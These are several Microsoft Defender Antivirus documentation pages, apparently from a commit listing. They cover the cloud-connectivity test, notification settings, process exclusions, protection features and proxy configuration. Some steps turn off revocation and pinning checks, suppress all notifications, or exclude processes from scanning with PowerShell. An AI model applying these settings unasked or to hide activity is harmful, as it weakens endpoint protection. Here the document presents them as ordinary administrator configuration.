-|Work-around solution (Alternative) <br/> _Not best practice since you'll no longer check for revoked certificates or certificate pinning_.| Disable CRL check only for SPYNET. <br/> Configuring this registry SSLOption disables CRL check only for SPYNET reporting. It wonΓÇÖt impact other services.<br/><br/> To to this: <br/> Go to **HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet** > set SSLOptions (dword) to 0 (hex). <br/> - 0 ΓÇô disable pinning and revocation checks <br/> - 1 ΓÇô disable pinning <br/> - 2 ΓÇô disable revocation checks only <br/> - 3 ΓÇô enable revocation checks and pinning (default)|
-
-## Attempt to download a fake malware file from Microsoft
-
-You can download a [sample file](/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-cloud-delivered-protection) that Microsoft Defender Antivirus will detect and block if you're properly connected to the cloud.
-
-> [!NOTE]
-> The downloaded file is not exactly malware. It's a fake file designed to test if you're properly connected to the cloud.
-
-If you're properly connected, you'll see a warning Microsoft Defender Antivirus notification.
-
-If you're using Microsoft Edge, you'll also see a notification message:
--
-A similar message occurs if you're using Internet Explorer:
--
-### View the fake malware detection in your Windows Security app
-
-1. On your task bar, select the Shield icon, open the **Windows Security** app. Or, search the **Start** for *Security*.
-
-1. Select **Virus & threat protection**, and then select **Protection history**.
-
-1. Under the **Quarantined threats** section, select **See full history** to see the detected fake malware.
-
- > [!NOTE]
- > Versions of Windows 10 before version 1703 have a different user interface. See [Microsoft Defender Antivirus in the Windows Security app](microsoft-defender-security-center-antivirus.md).
-
- The Windows event log will also show [Windows Defender client event ID 1116](/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus/).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
->
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
->
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
->
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
->
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
->
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
->
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
->
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## See also
--- [Configure device proxy and Internet connectivity settings for Microsoft Defender for Endpoint](configure-proxy-internet.md)-- [Use Group Policy settings to configure and manage Microsoft Defender Antivirus](use-group-policy-microsoft-defender-antivirus.md)-- [Important changes to Microsoft Active Protection Services endpoint](https://techcommunity.microsoft.com/t5/Configuration-Manager-Archive/Important-changes-to-Microsoft-Active-Protection-Service-MAPS/ba-p/274006) -
security Configure Notifications Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-notifications-microsoft-defender-antivirus.md
- Title: Configure Microsoft Defender Antivirus notifications
-description: Learn how to configure and customize both standard and other Microsoft Defender Antivirus notifications on endpoints.
------ Previously updated : 10/18/2021----- m365-security-- tier2-- mde-ngp--
-# Configure Microsoft Defender Antivirus notifications that appear on endpoints
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-In Windows 10 and Windows 11, application notifications about malware detection and remediation are more robust, consistent, and concise. Microsoft Defender Antivirus notifications appear on endpoints when scans are completed and threats are detected. Notifications follow both scheduled and manually triggered scans. These notifications also appear in the **Notification Center**, and a summary of scans and threat detections appear at regular time intervals.
-
-If you're part of your organization's security team, you can configure how notifications appear on endpoints, such as notifications that prompt for a system reboot or that indicate a threat has been detected and remediated.
-
-## Configure antivirus notifications using Group Policy or the Windows Security app
-
-You can configure the display of additional notifications, such as recent threat detection summaries, in the [Windows Security app](microsoft-defender-security-center-antivirus.md) and with Group Policy.
-
-> [!NOTE]
-> In Windows 10, version 1607 the feature was called **Enhanced notifications** and was configured under **Windows Settings** \> **Update & security** \> **Windows Defender**. In Group Policy settings for all versions of Windows 10 and Windows 11, the notification feature is called **Enhanced notifications**.
-
-### Use Group Policy to disable additional notifications
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)).
-
-2. Right-click the Group Policy Object you want to configure, and then select **Edit**.
-
-3. In the **Group Policy Management Editor** go to **Computer configuration**.
-
-4. Select **Administrative templates**.
-
-5. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** > **Reporting**.
-
-6. Double-click **Turn off enhanced notifications**, and set the option to **Enabled**. Then select **OK**. This will prevent additional notifications from appearing.
-
-> [!IMPORTANT]
-> Disabling additional notifications will not disable critical notifications, such as threat detection and remediation alerts.
-
-### Use the Windows Security app to disable additional notifications
-
-1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for **Security**.
-
-2. Select **Virus & threat protection** tile (or the shield icon on the left menu bar) and, then select **Virus & threat protection settings**
-
-3. Scroll to the **Notifications** section and select **Change notification settings**.
-
-4. Slide the switch to **Off** or **On** to disable or enable additional notifications.
-
-> [!IMPORTANT]
-> Disabling additional notifications will not disable critical notifications, such as threat detection and remediation alerts.
-
-## Configure standard notifications on endpoints using Group Policy
-
-You can use Group Policy to:
--- Display additional, customized text on endpoints when the user needs to perform an action-- Hide all notifications on endpoints-- Hide reboot notifications on endpoints-
-Hiding notifications can be useful in situations where you can't hide the entire Microsoft Defender Antivirus interface. See [Prevent users from seeing or interacting with the Microsoft Defender Antivirus user interface](prevent-end-user-interaction-microsoft-defender-antivirus.md) for more information. Hiding notifications will only occur on endpoints to which the policy has been deployed. Notifications related to actions that must be taken (such as a reboot) will still appear on the [Microsoft Configuration Manager Endpoint Protection monitoring dashboard and reports](/configmgr/protect/deploy-use/monitor-endpoint-protection).
-
-To add custom contact information to endpoint notifications, see [Customize the Windows Security app for your organization](/windows/security/threat-protection/windows-defender-security-center/windows-defender-security-center).
-
-### Use Group Policy to hide notifications
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)).
-
-2. Right-click the Group Policy Object you want to configure, and then select **Edit**.
-
-3. In the **Group Policy Management Editor** go to **Computer configuration** and then select **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Client interface**.
-
-5. Double-click **Suppress all notifications** and set the option to **Enabled**.
-
-6. Select **OK**. This will prevent additional notifications from appearing.
-
-### Use Group Policy to hide reboot notifications
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)).
-
-2. Right-click the Group Policy Object you want to configure and then select **Edit**.
-
-2. In the **Group Policy Management Editor** go to **Computer configuration**.
-
-3. Click **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Client interface**.
-
-5. Double-click **Suppresses reboot notifications** and set the option to **Enabled**.
-
-5. Select **OK**. This will prevent additional notifications from appearing.
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Configure Process Opened File Exclusions Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus.md
- Title: Configure exclusions for files opened by specific processes
-description: You can exclude files from scans if they've been opened by a specific process.
----------- m365-security-- tier2-- mde-ngp Previously updated : 03/19/2024----
-# Configure exclusions for files opened by processes
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows -
-You can exclude files that are opened by specific processes from Microsoft Defender Antivirus scans. Note that these types of exclusions are for files that are opened by processes and not the processes themselves. To exclude a process, add a file exclusion (see [Configure and validate exclusions based on file extension and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md)).
-
-See [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) and review the information in [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md) before defining your exclusion lists.
-
-This article describes how to configure exclusion lists.
-
-## Examples of process exclusions
-
-|Exclusion|Example|
-|||
-|Any file on the machine that is opened by any process with a specific file name|Specifying `test.exe` would exclude files opened by: <p>`c:\sample\test.exe` <p> `d:\internal\files\test.exe`|
-|Any file on the machine that is opened by any process under a specific folder|Specifying `c:\test\sample\*` would exclude files opened by: <p> `c:\test\sample\test.exe` <p> `c:\test\sample\test2.exe` <p> `c:\test\sample\utility.exe`|
-|Any file on the machine that is opened by a specific process in a specific folder|Specifying `c:\test\process.exe` would exclude files only opened by `c:\test\process.exe`|
-
-When you add a process to the process exclusion list, Microsoft Defender Antivirus won't scan files opened by that process, no matter where the files are located. The process itself, however, will be scanned unless it has also been added to the [file exclusion list](configure-extension-file-exclusions-microsoft-defender-antivirus.md).
-
-The exclusions only apply to [always-on real-time protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md). They don't apply to scheduled or on-demand scans.
-
-Changes made with Group Policy to the exclusion lists **will show** in the lists in the [Windows Security app](microsoft-defender-security-center-antivirus.md). However, changes made in the Windows Security app **will not show** in the Group Policy lists.
-
-You can add, remove, and review the lists for exclusions in Group Policy, Microsoft Configuration Manager, Microsoft Intune, and with the Windows Security app, and you can use wildcards to further customize the lists.
-
-You can also use PowerShell cmdlets and WMI to configure the exclusion lists, including reviewing your lists.
-
-By default, local changes made to the lists (by users with administrator privileges; changes made with PowerShell and WMI) are merged with the lists as defined (and deployed) by Group Policy, Configuration Manager, or Intune. The Group Policy lists take precedence if there are conflicts.
-
-You can [configure how locally and globally defined exclusions lists are merged](configure-local-policy-overrides-microsoft-defender-antivirus.md#merge-lists) to allow local changes to override managed deployment settings.
-
-> [!NOTE]
-> **Network Protection** and **Attack surface reduction rules** are directly impacted by process exclusions on all platforms, meaning that a process exclusion on any OS (Windows, MacOS, Linux) will result in Network Protection or ASR being unable to inspect traffic or enforce rules for that specific process.
-
-### Image name vs full path for process exclusions
-
-Two different types of process exclusions may be set. A process may be excluded by image name, or by full path. The image name is simply the file name of the process, without the path.
-
-For example, given the process `MyProcess.exe` running from `C:\MyFolder\` the full path to this process would be `C:\MyFolder\MyProcess.exe` and the image name is `MyProcess.exe`.
-
-Image name exclusions are much more broad - an exclusion on `MyProcess.exe` will exclude any processes with this image name, regardless of the path they are run from. So for example, if the process `MyProcess.exe` is excluded by image name, it will also be excluded if it is run from `C:\MyOtherFolder`, from removable media, et cetera. As such it is recommended that whenever possible, the full path is used.
-
-### Use wildcards in the process exclusion list
-
-The use of wildcards in the process exclusion list is different from their use in other exclusion lists. When the process exclusion is defined as an image name only, wildcard usage is not allowed. However when a full path is used, wildcards are supported and the wildcard behavior behaves as described in [File and Folder Exclusions](configure-extension-file-exclusions-microsoft-defender-antivirus.md)
-
-The use of environment variables (such as `%ALLUSERSPROFILE%`) as wildcards when defining items in the process exclusion list is also supported. Details and a full list of supported environment variables are described in [File and Folder Exclusions](configure-extension-file-exclusions-microsoft-defender-antivirus.md).
-
-The following table describes how the wildcards can be used in the process exclusion list, when a path is supplied:
-
-|Wildcard|Example use|Example matches|
-||||
-|`*` (asterisk) <p> Replaces any number of characters.|`C:\MyFolder\*`|Any file opened by `C:\MyFolder\MyProcess.exe` or `C:\MyFolder\AnotherProcess.exe`|
-| |`C:\*\*\MyProcess.exe`|Any file opened by `C:\MyFolder1\MyFolder2\MyProcess.exe` or `C:\MyFolder3\MyFolder4\MyProcess.exe`|
-| |`C:\*\MyFolder\My*.exe`|Any file opened by `C:\MyOtherFolder\MyFolder\MyProcess.exe` or `C:\AnotherFolder\MyFolder\MyOtherProcess.exe`|
-|'?' (question mark) <p> Replaces one character. |`C:\MyFolder\MyProcess??.exe`|Any file opened by `C:\MyFolder\MyProcess42.exe` or `C:\MyFolder\MyProcessAA.exe` or `C:\MyFolder\MyProcessF5.exe`|
-| Environment Variables |`%ALLUSERSPROFILE%\MyFolder\MyProcess.exe`|Any file opened by `C:\ProgramData\MyFolder\MyProcess.exe`|
-
-### Contextual Process Exclusions
-
-Note that a process exclusion may also be defined via a [Contextual exclusion](configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md) allowing for example a specific file to be excluded only if it is opened by a specific process.
-
-## Configure the list of exclusions for files opened by specified processes
-
-### Use Microsoft Intune to exclude files that have been opened by specified processes from scans
-
-For more information, see [Configure device restriction settings in Microsoft Intune](/intune/device-restrictions-configure) and [Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune](/intune/device-restrictions-windows-10#microsoft-defender-antivirus).
-
-### Use Microsoft Configuration Manager to exclude files that have been opened by specified processes from scans
-
-See [How to create and deploy antimalware policies: Exclusion settings](/configmgr/protect/deploy-use/endpoint-antimalware-policies#exclusion-settings) for details on configuring Microsoft Configuration Manager (current branch).
-
-### Use Group Policy to exclude files that have been opened by specified processes from scans
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and click **Edit**.
-
-2. In the **Group Policy Management Editor**, go to **Computer configuration** and click **Administrative templates**.
-
-3. Expand the tree to **Windows components \> Microsoft Defender Antivirus \> Exclusions**.
-
-4. Double-click **Process Exclusions** and add the exclusions:
- 1. Set the option to **Enabled**.
- 2. Under the **Options** section, click **Show...**.
- 3. Enter each process on its own line under the **Value name** column. See the example table for the different types of process exclusions. Enter **0** in the **Value** column for all processes.
-
-5. Click **OK**.
-
-### Use PowerShell cmdlets to exclude files that have been opened by specified processes from scans
-
-Using PowerShell to add or remove exclusions for files that have been opened by processes requires using a combination of three cmdlets with the `-ExclusionProcess` parameter. The cmdlets are all in the [Defender module](/powershell/module/defender/).
-
-The format for the cmdlets is:
-
-```PowerShell
-<cmdlet> -ExclusionProcess "<item>"
-```
-
-The following are allowed as the \<cmdlet\>:
-
-|Configuration action|PowerShell cmdlet|
-|||
-|Create or overwrite the list|`Set-MpPreference`|
-|Add to the list|`Add-MpPreference`|
-|Remove items from the list|`Remove-MpPreference`|
-
-> [!IMPORTANT]
-> If you have created a list, either with `Set-MpPreference` or `Add-MpPreference`, using the `Set-MpPreference` cmdlet again will overwrite the existing list.
-
-For example, the following code snippet would cause Microsoft Defender Antivirus scans to exclude any file that is opened by the specified process:
-
-```PowerShell
-Add-MpPreference -ExclusionProcess "c:\internal\test.exe"
-```
-
-For more information on how to use PowerShell with Microsoft Defender Antivirus, see Manage antivirus with PowerShell cmdlets and [Microsoft Defender Antivirus cmdlets](/powershell/module/defender).
-
-## Use Windows Management Instruction (WMI) to exclude files that have been opened by specified processes from scans
-
-Use the [**Set**, **Add**, and **Remove** methods of the **MSFT_MpPreference**](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class for the following properties:
-
-```WMI
-ExclusionProcess
-```
-
-The use of **Set**, **Add**, and **Remove** is analogous to their counterparts in PowerShell: `Set-MpPreference`, `Add-MpPreference`, and `Remove-MpPreference`.
-
-For more information and allowed parameters, see [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal).
-
-## Use the Windows Security app to exclude files that have been opened by specified processes from scans
-
-Follow the instructions in [Add exclusions in the Windows Security app](microsoft-defender-security-center-antivirus.md).
-
-## Review the list of exclusions
-
-You can retrieve the items in the exclusion list with MpCmdRun, PowerShell, [Microsoft Configuration Manager](/configmgr/protect/deploy-use/endpoint-antimalware-policies#exclusion-settings), [Intune](/intune/device-restrictions-configure), or the [Windows Security app](microsoft-defender-security-center-antivirus.md).
-
-If you use PowerShell, you can retrieve the list in two ways:
--- Retrieve the status of all Microsoft Defender Antivirus preferences. Each of the lists are displayed on separate lines, but the items within each list are combined into the same line.-- Write the status of all preferences to a variable, and use that variable to only call the specific list you're interested in. Each use of `Add-MpPreference` is written to a new line.-
-### Validate the exclusion list by using MpCmdRun
-
-To check exclusions with the dedicated [command-line tool mpcmdrun.exe](./command-line-arguments-microsoft-defender-antivirus.md?branch=v-anbic-wdav-new-mpcmdrun-options), use the following command:
-
-```DOS
-MpCmdRun.exe -CheckExclusion -path <path>
-```
-
-> [!NOTE]
-> Checking exclusions with MpCmdRun requires Microsoft Defender Antivirus CAMP version 4.18.1812.3 (released in December 2018) or later.
-
-### Review the list of exclusions alongside all other Microsoft Defender Antivirus preferences by using PowerShell
-
-Use the following cmdlet:
-
-```PowerShell
-Get-MpPreference
-```
-
-For more information on how to use PowerShell with Microsoft Defender Antivirus, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Microsoft Defender Antivirus cmdlets](/powershell/module/defender) .
-
-### Retrieve a specific exclusions list by using PowerShell
-
-Use the following code snippet (enter each line as a separate command); replace **WDAVprefs** with whatever label you want to name the variable:
-
-```PowerShell
-$WDAVprefs = Get-MpPreference
-$WDAVprefs.ExclusionProcess
-```
-
-For more information on how to use PowerShell with Microsoft Defender Antivirus, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Microsoft Defender Antivirus cmdlets](/powershell/module/defender).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## Related articles
--- [Configure and validate exclusions in Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)-- [Configure and validate exclusions based on file name, extension, and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md)-- [Configure Microsoft Defender Antivirus exclusions on Windows Server](configure-server-exclusions-microsoft-defender-antivirus.md)-- [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md)-- [Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-
security Configure Protection Features Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-protection-features-microsoft-defender-antivirus.md
- Title: Enable and configure Microsoft Defender Antivirus protection features
-description: Enable behavior-based, heuristic, and real-time protection in Microsoft Defender Antivirus.
----------- m365-security-- tier2-- mde-ngp Previously updated : 02/18/2024--
-# Configure behavioral, heuristic, and real-time protection
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus -
-**Platforms**
-- Windows-
-Microsoft Defender Antivirus uses several methods to provide threat protection:
--- Cloud protection for near-instant detection and blocking of new and emerging threats-- Always-on scanning, using file and process behavior monitoring and other heuristics (also known as "real-time protection")-- Dedicated protection updates based on machine learning, human and automated big-data analysis, and in-depth threat resistance research-
-You can configure how Microsoft Defender Antivirus uses these methods with [Microsoft Defender for Endpoint Security Configuration Management](/mem/intune/protect/mde-security-integration), [Microsoft Intune](/microsoft-365/security/defender-endpoint/use-intune-config-manager-microsoft-defender-antivirus), Microsoft Configuration Manager, [Group Policy](/microsoft-365/security/defender-endpoint/use-group-policy-microsoft-defender-antivirus), [PowerShell cmdlets](/microsoft-365/security/defender-endpoint/use-powershell-cmdlets-microsoft-defender-antivirus), and [Windows Management Instrumentation (WMI)](/microsoft-365/security/defender-endpoint/use-wmi-microsoft-defender-antivirus).
-
-This section covers configuration for always-on scanning, including how to detect and block apps that are deemed unsafe, but may not be detected as malware.
-
-See [Use next-gen Microsoft Defender Antivirus technologies through cloud protection](cloud-protection-microsoft-defender-antivirus.md) for how to enable and configure Microsoft Defender Antivirus cloud protection.
-
-## In this section
-
-| Topic|Description |
-|||
-| [Detect and block potentially unwanted applications](detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md)| Detect and block apps that may be unwanted in your network, such as adware, browser modifiers and toolbars, and rogue or fake antivirus apps |
-| [Enable and configure Microsoft Defender Antivirus protection capabilities](configure-real-time-protection-microsoft-defender-antivirus.md)|Enable and configure real-time protection, heuristics, and other always-on Microsoft Defender Antivirus monitoring features |
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## See also
--- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Configure Proxy Internet https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-proxy-internet.md
- Title: Configure your devices to connect to the Defender for Endpoint service using a proxy
-description: Learn how to configure your devices to enable communication with the cloud service using a proxy.
------- m365-security-- tier1-- Previously updated : 10/25/2023--
-# STEP 2: Configure your devices to connect to the Defender for Endpoint service using a proxy
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/WindowsForBusiness/windows-atp?ocid=docs-wdatp-configureendpointsscript-abovefoldlink)
-
-> [!IMPORTANT]
-> Devices that are configured for IPv6-only traffic are not supported.
-
-The Defender for Endpoint sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data and communicate with the Defender for Endpoint service. The embedded Defender for Endpoint sensor runs in system context using the LocalSystem account.
-
-> [!TIP]
-> For organizations that use forward proxies as a gateway to the Internet, you can use network protection to [investigate connection events that occur behind forward proxies](investigate-behind-proxy.md).
-
-The WinHTTP configuration setting is independent of the Windows Internet (WinINet) browsing proxy settings (see, [WinINet vs. WinHTTP](/windows/win32/wininet/wininet-vs-winhttp)). It can only discover a proxy server by using the following discovery methods:
--- Autodiscovery methods:-
- - Transparent proxy
-
- - Web Proxy Auto-discovery Protocol (WPAD)
-
- > [!NOTE]
- > If you're using Transparent proxy or WPAD in your network topology, you don't need special configuration settings.
--- Manual static proxy configuration:-
- - Registry-based configuration
-
- - WinHTTP configured using netsh command: Suitable only for desktops in a stable topology (for example: a desktop in a corporate network behind the same proxy)
-
-> [!NOTE]
-> Defender antivirus and EDR proxies can be set independently. In the sections that follow, be aware of those distinctions.
-
-## Configure the proxy server manually using a registry-based static proxy
-
-Configure a registry-based static proxy for Defender for Endpoint detection and response (EDR) sensor to report diagnostic data and communicate with Defender for Endpoint services if a computer isn't permitted to connect to the Internet.
-
-> [!NOTE]
-> When using this option on Windows 10, or Windows 11, or Windows Server 2019, or Windows Server 2022, it is recommended to have the following (or later) build and cumulative update rollup:
->
-> - Windows 11
-> - Windows 10, version 1809 or Windows Server 2019, or Windows Server 2022 - <https://support.microsoft.com/kb/5001384>
-> - Windows 10, version 1909 - <https://support.microsoft.com/kb/4601380>
-> - Windows 10, version 2004 - <https://support.microsoft.com/kb/4601382>
-> - Windows 10, version 20H2 - <https://support.microsoft.com/kb/4601382>
->
-> These updates improve the connectivity and reliability of the CnC (Command and Control) channel.
-
-The static proxy is configurable through group policy (GP), both the settings under group policy values should be configured to the proxy server for using EDR. The group policy is available in Administrative Templates.
--- **Administrative Templates > Windows Components > Data Collection and Preview Builds > Configure Authenticated Proxy usage for the Connected User Experience and Telemetry Service**.-
- Set it to **Enabled** and select **Disable Authenticated Proxy usage**.
-
- :::image type="content" source="media/atp-gpo-proxy1.png" alt-text="The Group Policy setting1 status pane" lightbox="media/atp-gpo-proxy1.png":::
--- **Administrative Templates > Windows Components > Data Collection and Preview Builds > Configure connected user experiences and telemetry**:-
- Configure the proxy.
-
- :::image type="content" source="media/atp-gpo-proxy2.png" alt-text="The Group Policy setting2 status pane" lightbox="media/atp-gpo-proxy2.png":::
--
-| Group Policy | Registry key | Registry entry | Value |
-|:|:|:|:|
-| Configure authenticated proxy usage for the connected user experience and the telemetry service | `HKLM\Software\Policies\Microsoft\Windows\DataCollection` | `DisableEnterpriseAuthProxy` | 1 (REG_DWORD) |
-| Configure connected user experiences and telemetry | `HKLM\Software\Policies\Microsoft\Windows\DataCollection` | `TelemetryProxyServer` | ```servername:port or ip:port``` <br> <br> For example: ```10.0.0.6:8080``` (REG_SZ) |
-
-> [!NOTE]
-> If you are using 'TelemetryProxyServer' setting on devices that are otherwise **completely offline**, meaning the operating system is unable to connect for the online certificate revocation list or Windows Update, then it is required to add the additional registry setting `PreferStaticProxyForHttpRequest` with a value of `1`.
->
-> Parent registry path location for "PreferStaticProxyForHttpRequest" is "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
->
-> The following command can be used to insert the registry value in the correct location:
->
-> ```console
-> reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /v PreferStaticProxyForHttpRequest /t REG_DWORD /d 1 /f
-> ```
->
-> The above registry value is applicable only starting with MsSense.exe version 10.8210.* and later, or version 10.8049.* and later.
---
-## Configure a static proxy for Microsoft Defender Antivirus
-
-Microsoft Defender Antivirus [cloud-delivered protection](cloud-protection-microsoft-defender-antivirus.md) provides near-instant, automated protection against new and emerging threats. Note, the connectivity is required for [custom indicators](manage-indicators.md) when Defender Antivirus is your active anti-malware solution. For [EDR in block mode](edr-in-block-mode.md) has primary anti-malware solution when using a non-Microsoft solution.
-
-Configure the static proxy using the Group Policy available in Administrative Templates:
-
-1. **Administrative Templates > Windows Components > Microsoft Defender Antivirus > Define proxy server for connecting to the network**.
-
-2. Set it to **Enabled** and define the proxy server. Note, the URL must have either http:// or https://. For supported versions for https://, see [Manage Microsoft Defender Antivirus updates](microsoft-defender-antivirus-updates.md).
-
- :::image type="content" source="mediav.png":::
-
-3. Under the registry key `HKLM\Software\Policies\Microsoft\Windows Defender`, the policy sets the registry value `ProxyServer` as REG_SZ.
-
- The registry value `ProxyServer` takes the following string format:
-
- `<server name or ip>:<port>`
-
- For example: http://10.0.0.6:8080
-
->[!NOTE]
->If you are using static proxy setting on devices that are otherwise completely offline, meaning the operating system is unable to connect for the online certificate revocation list or Windows Update, then it is required to add the additional registry setting SSLOptions with a dword value of 0. Parent registry path location for "SSLOptions" is "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" <br>
->For resiliency purposes and the real-time nature of cloud-delivered protection, Microsoft Defender Antivirus will cache the last known working proxy. Ensure your proxy solution does not perform SSL inspection. This will break the secure cloud connection.
->
->Microsoft Defender Antivirus will not use the static proxy to connect to Windows Update or Microsoft Update for downloading updates. Instead, it will use a system-wide proxy if configured to use Windows Update, or the configured internal update source according to the [configured fallback order](manage-protection-updates-microsoft-defender-antivirus.md).
->
->If required, you can use **Administrative Templates > Windows Components > Microsoft Defender Antivirus > Define proxy auto-config (.pac)** for connecting to the network. If you need to set up advanced configurations with multiple proxies, use **Administrative Templates > Windows Components > Microsoft Defender Antivirus > Define addresses** to bypass proxy server and prevent Microsoft Defender Antivirus from using a proxy server for those destinations.
->
->You can use PowerShell with the `Set-MpPreference` cmdlet to configure these options:
->
->- ProxyBypass
->- ProxyPacUrl
->- ProxyServer
-
->[!NOTE]
->To use the proxy correctly, configure these three different proxy settings:
-> - Microsoft Defender for Endpoint (MDE)
-> - AV (Antivirus)
-> - Endpoint Detection and Response (EDR)
--
-## Configure the proxy server manually using netsh command
-
-Use netsh to configure a system-wide static proxy.
-
-> [!NOTE]
->
-> - This will affect all applications including Windows services which use WinHTTP with default proxy.</br>
-
-1. Open an elevated command line:
- 1. Go to **Start** and type **cmd**.
- 1. Right-click **Command prompt** and select **Run as administrator**.
-
